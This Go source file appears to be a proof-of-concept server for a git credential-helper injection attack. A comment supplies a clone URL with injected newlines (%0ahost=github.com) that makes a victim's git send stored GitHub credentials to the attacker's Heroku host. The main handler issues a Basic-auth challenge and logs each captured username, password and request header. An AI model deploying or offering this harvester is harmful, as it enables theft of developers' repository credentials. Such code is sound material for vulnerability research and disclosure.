package main

import (
	"fmt"
	"log"
	"net/http"
	"os"

	"github.com/gorilla/mux"
)

// Your Heroku endpoint hostname https://MYAPP.herokuapp.com
// Trigger the vuln via git clone 'https://MYAPP.herokuapp.com?%0ahost=github.com%0aprotocol=https'

func main() {
	port := os.Getenv("PORT")
	if port == "" {
		log.Println("$PORT must be set")
	}

	router := mux.NewRouter().StrictSlash(true)

	router.HandleFunc("/test/", processTestRequest)
	router.HandleFunc("/", handleGitCreds)
	router.NotFoundHandler = http.HandlerFunc(notFound)
	http.ListenAndServe(":"+port, router)
}

func handleGitCreds(w http.ResponseWriter, r *http.Request) {
	log.Println("[!] Handling GIT Greds")
	for name, values := range r.Header {
		for _, value := range values {
			log.Println(name, value)
		}
	}
	username, password, ok := r.BasicAuth()
	if ok {
		log.Printf("user: %v password: %v\n", username, password)
		w.WriteHeader(200)
		return
	}
	w.Header().Set("WWW-Authenticate", `Basic realm="foo"`)
	http.Error(w, "Not authorized", 401)
	return
}

func processTestRequest(w http.ResponseWriter, r *http.Request) {

	log.Println("[+] processTestRequest")
	fmt.Fprintf(w, "OK!")
}

func notFound(w http.ResponseWriter, r *http.Request) {
	log.Println("[+] Not Found:", r.RemoteAddr)
	w.WriteHeader(http.StatusNotFound)
}

func redirect(w http.ResponseWriter, r *http.Request) {
	http.Redirect(w, r, "https://www.heroku.com", http.StatusMovedPermanently)
}
